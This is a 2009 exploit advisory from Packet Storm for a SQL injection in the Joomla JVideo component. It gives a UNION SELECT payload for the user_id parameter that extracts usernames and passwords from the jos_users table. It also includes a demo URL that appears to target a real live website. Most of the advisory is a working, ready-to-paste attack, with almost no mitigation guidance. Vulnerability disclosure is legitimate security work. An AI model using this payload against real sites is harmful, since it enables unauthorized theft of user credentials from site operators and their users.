Joomla JVideo 0.3.x SQL Injection

2009-05-30T00:00:00
ID PACKETSTORM:77939
Type packetstorm
Reporter Chip D3 Bi0s
Modified 2009-05-30T00:00:00

Description

                                        
                                            `++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Joomla Component com_jvideo (user_id) SQL-injection Vulnerability  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
###################################################  
[+] Author : Chip D3 Bi0s  
[+] Greetz : d4n!ux + x_jeshua + eCORE + Painboy + rayok3nt + 3l3cTron1k_0  
[+] Vulnerability : SQL injection  
[+] Google Dork : imagine ;)  
--------------------------------------------------  
author : Russell...  
author Email : chipdebios[alt+64]gmail.com  
  
###################################################  
  
Example:  
http://localHost/path/index.php?option=com_jvideo&view=user&user_id=62[SQL code]  
  
  
SQL code:  
+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users  
  
  
DEMO:  
  
  
http://www.mosessite.com/index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users  
  
etc, etc....  
+++++++++++++++++++++++++++++++++++++++  
#[!] Produced in South America  
+++++++++++++++++++++++++++++++++++++++  
  
<name>JVideo!</name>  
<creationDate>September 2008</creationDate>  
<author>Infinovision.com</author>  
<authorEmail>team@infinovision.com</authorEmail>  
<authorUrl>http://www.infinovision.com</authorUrl>  
<copyright>Copyright 2008 Infinovision.com</copyright>  
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>  
<version>0.3.11c Beta</version>  
<description>JVideo! Component</description>  
  
  
`